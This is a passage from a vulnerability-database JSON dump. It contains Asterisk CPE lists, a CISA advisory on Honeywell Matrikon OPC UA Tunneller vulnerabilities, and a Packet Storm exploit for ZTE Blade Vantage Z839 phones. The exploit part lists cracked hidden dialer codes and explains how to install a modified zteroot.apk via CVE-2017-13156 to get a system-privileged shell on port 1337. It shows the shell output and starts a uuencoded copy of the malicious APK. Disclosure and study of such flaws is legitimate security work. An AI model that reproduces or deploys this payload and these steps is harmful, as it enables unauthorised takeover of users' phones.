"cpe:2.3:a:digium:asterisk:13.14.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.10.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.13:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.12:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.16.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert14_rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.21.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.15.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert15:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert9:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.10.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.7.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.14.0:*:*:*:lts:*:*:*", "cpe:2.3:a:digium:asterisk:11.20.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert16:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.17.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.13.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.24.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.02:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert13:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.15.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert8:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.21.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert11:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.15.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert10:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:13.13:cert2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert5:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.23.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert14:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.4.0:rc2:*:*:*:*:*:*"]}], "ics": [{"lastseen": "2021-02-27T19:48:21", "bulletinFamily": "info", "cvelist": ["CVE-2020-27274", "CVE-2020-27295", "CVE-2020-27297", "CVE-2020-27299"], "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor:** Matrikon, a subsidiary of Honeywell\n * **Equipment: **OPC UA Tunneller\n * **Vulnerabilities: **Heap-based Buffer Overflow, Out-of-bounds Read, Improper Check for Unusual or Exceptional Conditions, Uncontrolled Resource Consumption\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could allow an attacker to disclose sensitive information, remotely execute arbitrary code, or crash the device.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nHoneywell reports the vulnerabilities affect the following Matrikon products:\n\n * OPC UA Tunneller: All versions prior to 6.3.0.8233\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [HEAP-BASED BUFFER OVERFLOW CWE-122](<https://cwe.mitre.org/data/definitions/122.html>)\n\nThe affected product is vulnerable to a heap-based buffer overflow, which may allow an attacker to manipulate memory with controlled values and remotely execute code.\n\n[CVE-2020-27297](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-27297>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.2 [OUT-OF-BOUNDS READ CWE-125](<https://cwe.mitre.org/data/definitions/125.html>)\n\nThe affected product is vulnerable to an out-of-bounds read, which may allow an attacker to obtain and disclose sensitive data information or cause the device to crash.\n\n[CVE-2020-27299](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-27299>) has been assigned to this vulnerability. A CVSS v3 base score of 8.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N>)).\n\n#### 3.2.3 [IMPROPER CHECK FOR UNUSUAL OR EXCEPTIONAL CONDITIONS CWE-754](<https://cwe.mitre.org/data/definitions/754.html>)\n\nSome parsing functions in the affected product do not check the return value of malloc and the thread handling the message is forced to close, which may lead to a denial-of-service condition.\n\n[CVE-2020-27274](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-27274>) has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H>)).\n\n#### 3.2.4 [UNCONTROLLED RESOURCE CONSUMPTION CWE-400](<https://cwe.mitre.org/data/definitions/400.html>)\n\nThe affected product has uncontrolled resource consumption issues, which may allow an attacker to cause a denial-of-service condition.\n\n[CVE-2020-27295](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-27295>) has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS: **Multiple Sectors\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION: **Canada\n\n### 3.4 RESEARCHER\n\nUri Katz of Claroty reported these vulnerabilities to CISA.\n\n## 4\\. MITIGATIONS\n\nHoneywell recommends upgrading Matrikon OPC UA Tunneller to [Version 6.3.0.8233](<https://www.matrikonopc.com/opc-ua/products/opc-ua-tunneller.aspx>)\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are [not accessible from the Internet](<https://us-cert.cisa.gov/ics/alerts/ICS-ALERT-10-301-01>).\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://us-cert.cisa.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://us-cert.cisa.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsa-21-021-03>); we'd welcome your feedback.\n", "modified": "2021-01-21T00:00:00", "published": "2021-01-21T00:00:00", "id": "ICSA-21-021-03", "href": "https://www.us-cert.gov/ics/advisories/icsa-21-021-03", "type": "ics", "title": "Honeywell OPC UA Tunneller", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-11-28T17:48:03", "description": "", "published": "2020-11-27T00:00:00", "type": "packetstorm", "title": "ZTE Blade Vantage Z839 Emode.APK android.uid.system Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13156"], "modified": "2020-11-27T00:00:00", "id": "PACKETSTORM:160231", "href": "https://packetstormsecurity.com/files/160231/ZTE-Blade-Vantage-Z839-Emode.APK-android.uid.system-Privilege-Escalation.html", "sourceData": "`ZTE Blade Vantage Z839 Emode.APK android.uid.system LPE exploit \n=============================================================== \nZTE Blade Vantage (Z839) Android handsets running 7.1.1 contain an engineering mode that utilizes \"Android Secret Codes\" \nfor accessing hidden engineering functionality. Such hidden features are common for Android devices and perform \nfunctions such as testing sensors and modem settings. Using the \"secret codes\", it is also possible for ZTE to obtain \nroot privileges on any device by installing \"zteroot.apk\" (must be signed by ZTE as AndroidOS checks signature and privs \nduring install) and then using one of the Emode secret codes will run zteroot installed with android.uid.system which then \nuses additional device specific features to escalate to \"root\". The tested device was a ZTE Z839 running Android 7.1.1. \nIt is possible to use this feature to gain android.uid.system privileges on an impacted device by exploiting a known \ncode signing attack CVE-2017-13156 with a previously leaked copy of \"zteroot.apk\" for older versions of ZTE Android \ndevices. The Android installed permissions for com.zte.emode can be seen below. \n \nPackage: com.zte.emode \nApplication Label: Emode \nProcess Name: com.zte.emode \nVersion: 7.1.1 \nData Directory: /data/user/0/com.zte.emode \nAPK Path: /system/priv-app/Emode/Emode.apk \nUID: 1000 \nGID: [3009, 3002, 1023, 1015, 3003, 3001, 1021, 3004, 3005, 1000, 2002, 2950, 1010, 1007] \nShared Libraries: [/system/framework/modemservicemanager.jar] \nShared User ID: android.uid.system \nUses Permissions: \n- android.permission.CALL_PRIVILEGED \n- android.permission.BLUETOOTH \n- android.permission.BLUETOOTH_ADMIN \n- android.permission.VIBRATE \n- android.permission.WAKE_LOCK \n- android.permission.ACCESS_COARSE_LOCATION \n- android.permission.RECEIVE_BOOT_COMPLETED \n- android.permission.SHUTDOWN \n- android.permission.READ_PHONE_STATE \n- android.permission.WRITE_SECURE_SETTINGS \n- android.permission.WRITE_EXTERNAL_STORAGE \n- android.permission.MOUNT_UNMOUNT_FILESYSTEMS \n- android.permission.CAMERA \n- android.permission.MODEMSERVICE \n- android.permission.TFSIMLOCK \n- com.android.browser.permission.READ_HISTORY_BOOKMARKS \n- com.zte.chameleon.WRITE_CHAMELEON_DB \n- android.permission.ACCESS_LOCATION_EXTRA_COMMANDS \n- android.permission.READ_EXTERNAL_STORAGE \nDefines Permissions: \n- None \n \nThe Emode is enabled on production devices by default. The secret codes are found within the Emode APK \nwhich registers EmodeStartbyDialerService service and tests each entered code in the Dialer against it's MD5 hashed \nrepresentation to access different engineering functionality. The routine for matching functions can be found in \nEmodeHashMatchUtil of the com.zte.emode APK file. The following two codes can be used to test for this feature. \n \n*983*673636# - enable engineering mode \n*983*2567336# - disable engineering mode \n \nThe Emode tests for the \"zteroot\" manufacturer package and executes its activity using the secret code *983*872604# \nthis capability can be found in EngineerOrderControl. Emode application runs with android.uid.system privileges and \ncan access the device hardware, modem and numerous other engineering facilities (obtaining sensitive information \nfrom a device). \n \ncom/zte/emode/EngineerOrderControl.java: private static final String ZTEROOT_APP_ACTIVITY = \"zteroot\"; \ncom/zte/emode/EngineerOrderControl.java: private static final String ZTEROOT_APP_PACKAGE = \"zte.root\"; \ncom/zte/emode/EngineerOrderControl.java: checkPackageExistInfo(context, ZTEROOT_APP_PACKAGE, ZTEROOT_APP_ACTIVITY, true); \n \nThe following secret codes can be entered into the dialer to access different Emode functionality. \n \nEmode APK secret codes cracked \n============================== \n2a08f271128e0f40b63e75e2ad4db451:*#06# \nb1dd1e45998c5af494b6e2c459a61144:*#18# \nddd434b4bf9bb0db049ff8edccaec750:*#23# \n96fda30148daba63bd97cb4be3b97f15:*#19# \n5e83d7db10b6352aae05f7a846e287a7:*#08# \n54ac7fe9acf5d0fb37002269b0c5fba3:*#25# \n5bca87a7bc30f61f6793015ee5b157af:*#626# \ncbbf6bdb844ddcda7b2ffe008ea378fa:*983*7# \n66d5fa370336780b8bdf25c45c2d726a:*987*0# \n7b292469f6d3e4fe1442903d70206e3f:*983*1# \n8ac4ac004b629394a592e45f882d8960:*983*2# \n7109c5dbbf1f64b41a16c14368e4fb96:*983*0# \n3e1aab1b61375eff95a92b7d56d49f40:*983*3# \n882f6c6ef406f0349672b3efed6cafeb:*#3424# \n849aaa5c3b1c43fb44dbdc32c2129da7:*#0002# \n25d8061a7296bd4d715399abacf36611:*#0003# \nf7ec4dabddced4adf8dd54eb177f2868:*#0000# \nde8f66ef319ce1aadbc3649cd536a893:*#0001# \naddf8bd2f7c551c0aabae97e590a9226:*#2477# \n7d4e7e4b6e677439a5970f74c95540af:*#9999# \nd038ba1b0b313ad9a63bc0a45127e461:*983*93# \n8b077a3b228b2aac6eac76122793b288:*983*81# \n409789fb1b5bbbb5cc87abc3495c97c6:*983*31# \n322efc9f73c9bbaf7c9a00bb17e79400:*983*21# \n0185ca75382b183996bef84eb405cf3f:*983*10# \n11bba7af2edd86eda2c949935fed5139:*983*70# \n8a3b91b963d9681aadc099b5a60910a9:*983*25# \n7f962a95f24031ef080cdd616930e99f:*983*26# \n6031dd432d2127fa77a3aec553c4d367:*983*36# \n604e8b4732bf45409bbcab223f9230f5:*983*86# \n8b5719670c37f6623ccecc8477b86fdf:*983*07# \nea8ea80c448220cad9a1665c27114e52:*983*28# \n2a80a89d99ee316e986dc311ed82c17a:*983*84# \n6e4de71eabba7cdcc6b1b2c1a3540f04:*983*06# \n230ce4f7b781d1056542924b4599e195:*983*57# \n8e642ab295827ef1f3c03fe427e84ff0:*983*37# \n7b507c2ebe03e011c6d363c4c039ce11:*#09***# \n119a9bbcf3b2cd30b9807fe84151e119:*#26***# \n8ab0df1f684f046aeb69c62eb173207e:*983*423# \n375c807eb5bf1cf60ad6a01ff8618146:*983*473# \n881a019511ccf1b01a11a579289de4e4:*983*477# \n0d18a1d30d2b8622f630ea8fc07fecd0:*983*850# \n981002b23fe3fe2ba40d1cb6252c8f3e:*983*890# \n2133d592ae813a6455ece5f7a20d022d:*983*987# \nfd22b5dae9b2c4fa740d8ead578e33a4:*983*154# \nc354e3ede53c2ac0a555d89dfd1c8de1:*983*636# \nb415f977e522cd44b88b7e29169deb88:*983*205# \n63df5186f3541ea5e2f27f16c8c302f7:*983*26*# \nb35915efef8dd56beb5937613c09c2c0:*#0011*1# \nb6ef46aa7be2caae03238ab6e3295b1e:*#0012*1# \n6e3d833926c7ab0a79efadefc56fd37b:*#0009*1# \n1434f293c089ed6c9201b6e0bb872033:*#0006*1# \ncdac0e87dc42acb28fe9e62ced005599:*#0007*1# \ne1b3923d57c28f9c7d4d725e4ce5c918:*#0010*1# \n2f55ba40f5ae811f8723fea406085afe:*#0008*1# \n04f0bce7e1150dfc58cbfbfad005bffe:*#0005*1# \n6ec3a37d18c66882d12e9af886315ae6:*#0005*0# \n50a30fbaafb69df48d619c508e9ff46f:*#0012*0# \n91c84c865deae9e0fba544cc2757f6ba:*#0011*0# \nb09b4da043d65b96f54fd484bbfce51d:*#0007*0# \n3712f2c9b5ef0d2f868882b64b8d9f50:*#0008*0# \n125387409919838bd700b6891cefb2b6:*#0009*0# \n4bb479b629251216f1848dbf4ca2f321:*#0006*0# \neaa8c24773efe34dc5f575bd63e4529b:*737*746# \na6dfb8f917edaf981edc65c16bc864fd:*##100*564 \n1a97d97eb02f80cd95727bee6439882a:*983*5182# \n571dcb30c80e79f0e3290b2b68323d14:*##001*73# \n95eb1f3c0ca7481e5b0719ccb0c3c319:*983*2377# \n0d8c01e37aae0b8c471d37636b29c2c0:*983*7469# \nf6d37ae0d8b25e6fda46b85bc6caece7:*983*2778# \n5c24972b4ddc09ec9c1af697f712d62e:*983*4255# \n17405b61d8c4d96607e531e1b9095c4e:*983*4740# \nfe9c90b08fb070bfb3b994e6c1ea7269:*983*3640# \n32d31f5dde80de3f582a1531a6eb945f:*983*3470# \n3e9449f0ad9a264fdd670acaa0389a3d:*983*2679# \n4e8e563893f2f35d6366ee20a7223f80:*#4778378# \nd2b6fb5c3a95b082c2f9e0eb1c9baced:*983*1015# \n74e516298747495748b66bc899422248:*983*7336# \n466ae06ec2bd4cee23d79c00edbe2356:*983*1275# \n77b3902fa2dcd467921de6d69c926255:*983*7936# \naa5802becdb14211f041b7f3112bbfd8:*983*1237# \n9e38a4400d4f504cb5df6cf50631ad87:*983*7337# \n7da2f1e8a9120f516b530b2232d1350e:*983*6726# \n29d6254a45e8a082ce670793e7d90055:*983*2726# \n4f6781421ecae498059886d950bc9bc3:*983*2627# \nfa7a2ffcdfdf51134a575d44d7601957:*983*2884# \n6a967b944701c2db1c951781db472457:*983*0204# \nb98e50dddca0ce3dc8d11ae8d8c33185:*#2277437# \n0a0040ebcd1ae2cd60a413d3e8b7d3ea:*776532867# \n97152b1f5bd71e5ca1ea269f799ece98:*983*07*02# \n650791e38c47b67e03fcb827fd4b3a53:*983*87237# \nbe978c0adbc43464d688aa165d6967eb:*#477*2663# \na663ada71f2bc232875c43226cb3ea95:*983*07*01# \n1529790b7ead70ae48466e7e55284125:*983*87236# \n48e82552f0c4249c892772f78541fb7d:*983*83728# \nb2c1e13b674559e9ff7ea38bc03f5bb4:*983*35274# \n82470176ba01ea8d8c14cac32f705280:*983*87274# \n513b5d9467854041b754d0961f7c8baa:*983*27274# \n191fbc1acf1503e2536b9c3af5fb063d:*983*73564# \nd4b8cbe1708d4f75ebc8e6c2b0ac7226:*983*872602# \n9dce887d3f2073368d6b50aa3da0d08a:*983*872603# \n2c9bc01120277abdc091bec4241c58d5:*983*678283# \n6e42324fd00fc6c9540a73dbbff69bca:*987*123456# \ndf50f61e218120c308df3eca751f2d82:*983*872601# \ncdca5a6ac230837014626c1bacc9419f:*983*000111# \ne6241f1e4701da9372b93d1881eaff32:*983*673636# \n098ddfa577e6fe75ac99063d4ab56f4c:*##010*7936# \nab33a6a38866b80b497fe166100337ac:*983*872605# \n898c7f404a9ce619ce802275056f0efd:*983*276937# \nf485ded6f5a24060fef6006139988d71:*983*872604# \n6edbee042fea73ebe599d1024b20aec8:*983*288384# \n5207a35dc0e4c63251419baf7625e1a1:*983*564738# \n31fc423b7fbf10d2a8ec2f5b671db703:*983*3640*01# \nbe70b18e8f612999dfda7083ea9b8093:*983*9434622# \n1635bbdecb02bcc0a2acdbfb80eca105:*983*2288379# \n4fc21e32b70bf1a6c322e539a9af8653:*983*2567336# \n5761dc9ec803c900b5673ab96d1836a1:*#7693733284# \n9588f038bd93ec661bb725bf0acd642a:*983*6973738# \n \nEmode APK uncracked hashes \n========================== \n4481e919378d5b187fedcda6a67b2f22 \ne0fd6ca8412006d45ab3b53307ec8bc4 \n35a910e066a2aef2d585372ee406e241 \n5ea1f1219e5eca393538ef34315242dd \n48ff8fe7365a61ec27b1b0d32f41da05 \n9e2a891d317e8d60921b8a7932f4fcaa \n8c56dda5b33c070443b0a6fee8d3047c \nd175c00d149e4ec9d9e72cd04b7731ac \n6e9fdfc6626567b6e654eaa64b44d3a5 \nf92cf816ce7e9833bb17ad88eea5f8a8 \n09e1b61e97530007176910ccbb90a3b9 \n \nA version of zteroot.apk for earlier Android versions 4.1.1 leaked onto the xda-forums and it is possible to use \nthis APK along with CVE-2017-13156 to modify the APK without affecting it's signature to gain android.uid.system \nprivileges. A version of \"zte.root\" been attached which when installed on an affected ZTE phone will provide a \nlistening shell on port 1337 when the secret code is entered. Install the attached zteroot.apk with \"adb\" and \nthen use the dialer to bring up the \"root your phone\" menu of \"zte.root\" with code *983*872604# to activate your \nshell. \n \n$ adb shell \nsweet:/ $ busybox nc 127.0.0.1 1337 \nid \nuid=1000(system) gid=1000(system) groups=1000(system),1007(log),1010(wifi),1015(sdcard_rw),1021(gps),1023(media_rw),2002(diag),2950(qcom_diag),3001(net_bt_admin),3002(net_bt),3003(inet),3004(net_raw),3005(net_admin),3009(readproc),9997(everybody),41000(u0_a31000) context=u:r:system_app:s0 \nuname -a \nLinux localhost 3.10.49-g24db3b3 #1 SMP PREEMPT Sun Aug 20 11:59:09 CST 2017 armv7l \n \nThe Janus vulnerability is patched in the latest version of Z839V1.0.0B13 - this flaw was tested against \nfirmware version Z839V1.0.0B08. The Emode engineering access is present in the latest version but exploitation \nmust be achieved through other means as the Janus APK here will not load on a patched device. \n \n-- Hacker Fantastic \n(https://hacker.house) \n \n------------------------------------------------------------ \nbegin 644 zteroot.apk \nM9&5X\"C`S-0!XA)1-+M&B7#F.24>=AV_L'5\\+&SPY'H^X^@``<````'A6-!(` \nM`````````#@1``!R````<````!\\````X`@``&0```+0\"```(````X`,``\"4` \nM```@!````P```$@%``!4#```J`4``*@%``\"N!0``L@4``+8%``\"Z!0``UP4` \nM`.P%``#\\!0```@8```H&``!=!@``9`8``'H&``\"2!@``E08``)H&``\"=!@`` \nMH`8``*0&``\"H!@``K08``,4&``#H!@```P<``!X'``!1!P``=`<``(D'``\"H \nM!P``O`<``.$'``#V!P``#P@``#0(``!4\"```9`@``'X(``\"5\"```J0@``+X( \nM``#:\"```[@@```D)```=\"0``,PD``$D)``!=\"0``9@D``'X)``\"9\"0``G`D` \nM`*`)``\"D\"0``J`D``*T)``\"R\"0``N`D``+L)``\"_\"0``U`D``.`)``#L\"0`` \nM^`D```4*```+\"@``$PH``!P*```J\"@``,PH``#L*``!&\"@``4`H``%,*``!; \nM\"@``8PH``&L*``!Q\"@``=`H``((*``\"'\"@``D@H``)P*``\"A\"@``K0H``+,* \nM``\"W\"@``P`H``,H*``#9\"@``Y@H``/8*```#\"P``(0L``#4+``!)\"P``3@L` \nM`%X+``!J\"P``?@L``)$+``\";\"P``H0L``*T+``\"T\"P``NPL``,,+``#*\"P`` \nMU`L``-<+``#>\"P``YPL``.X+``#R\"P``^PL```T````/````%````!4````6 \nM````%P```!@````9````&@```!L````<````'0```!X````?````(````\"$` \nM```B````(P```\"0````E````)@```\"<````H````*0```\"H````K````+``` \nM`\"T````Q````.````#H````.`````````'@,```2`````P```(`,```3```` \nM`P```!0,```0````!``````````1````#````\"P,```0````%``````````0 \nM````%@`````````2````%@```&0,```2````%@```%P,```2````%P```&0, \nM```Q````'``````````R````'````\"P,```S````'````#P,```T````'``` \nM`$0,```U````'````#0,```T````'````!P,```T````'````%0,```T```` \nM'````$P,```T````'````&0,```V````'````'@,```W````'````&P,```T \nM````'````%P,```T````'````\"0,```X````'0`````````Y````'0````P, \nM```9`!L`:````!H`&P!H````&P`6`$\\````;``T`4````!L`#0!2````&P`6 \nM`%@````;`!8`60```!L``@!P`````@`*``@````\"``\\`5@````,`#0`(```` \nM`P`#`$0````#``$`8`````,``@!B`````P`!`&,````$``H`9`````D`!P!. \nM````\"0`3`%X````*````1P````T`$`!A````$``2``@````0`!<`2@```!,` \nM\"@`(````%0`6``@````5``4`9P```!8`&`!)````%P`*``@````7``D`0``` \nM`!<`!@!J````&``,`&8````9`!4`\"````!D`$0!5````&@`5``@````:``X` \nM50```!L`\"@`(````&P`(`#L````;``@`/````!L`\"``]````&P`*`$L````; \nM``0`30```!L`#P!6````&P`*`%H````;``H`7````!L`\"P!?````&P`4`&4` \nM```9`````````!,```!4#```<0```,`,``#<$````````!H`````````$P`` \nM`(@,``!Q````T`P``.T0````````&P````$````\"`````````'$````````` \nM_A`````````$(\"$](``\"+64``BUL``(M<``;+V1A=&$O;&]C86PO>G1E<F]O \nM=&1I<F5C=&QY`!,O<WES=&5M+V)I;B]B=7-Y8F]X``XO<WES=&5M+V)I;B]S \nM:``$,3,S-P`&/&EN:70^`%%!;GD@9&ES=')I8G5T:6]N+\"!R971R86YS;6ES \nM<VEO;BP@8V]P>6EN9RP@;W(@9&ES8VQO<W5R92!I<R`*<W1R:6-T;'D@<')O \nM:&EB:71E9\"X`!4-L;W-E`!1#;VYF:61E;G1I86P@9F]R(%I410`61F%I;&5D \nM('1O(')O;W0@<WES=&5M+@`!20`#24Q,``%*``%,``),20`\"3$P``TQ,3``6 \nM3&%N9')O:60O87!P+T%C=&EV:71Y.P`A3&%N9')O:60O87!P+T%L97)T1&EA \nM;&]G)$)U:6QD97([`!E,86YD<F]I9\"]A<'`O06QE<G1$:6%L;V<[`!E,86YD \nM<F]I9\"]C;VYT96YT+T-O;G1E>'0[`#%,86YD<F]I9\"]C;VYT96YT+T1I86QO 